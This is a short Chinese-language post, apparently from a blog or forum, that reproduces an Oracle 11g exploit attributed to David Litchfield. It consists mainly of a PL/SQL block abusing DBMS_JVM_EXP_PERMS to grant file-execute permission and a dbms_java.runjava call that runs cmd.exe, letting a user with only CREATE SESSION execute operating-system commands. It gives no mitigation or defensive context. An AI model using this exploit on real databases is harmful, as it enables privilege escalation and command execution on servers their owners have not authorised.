David Litchfield真是牛人中的牛人,oracle11g,只要是有create session权限的用户,就能执行系统命令:

DECLARE

POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
 CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.io.FilePermission','<>','execute','ENABLED' from dual;
 BEGIN
 OPEN C1;
 FETCH C1 BULK COLLECT INTO POL;
 CLOSE C1;
 DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
 END;
 /

select dbms_java.runjava(‘oracle/aurora/util/Wrapper c:\\windows\\system32\\cmd.exe /c dir>c:\\out.lst’)from dual;

原处:http://www.notsosecure.com/folder2/2010/02/04/hacking-oracle-11g/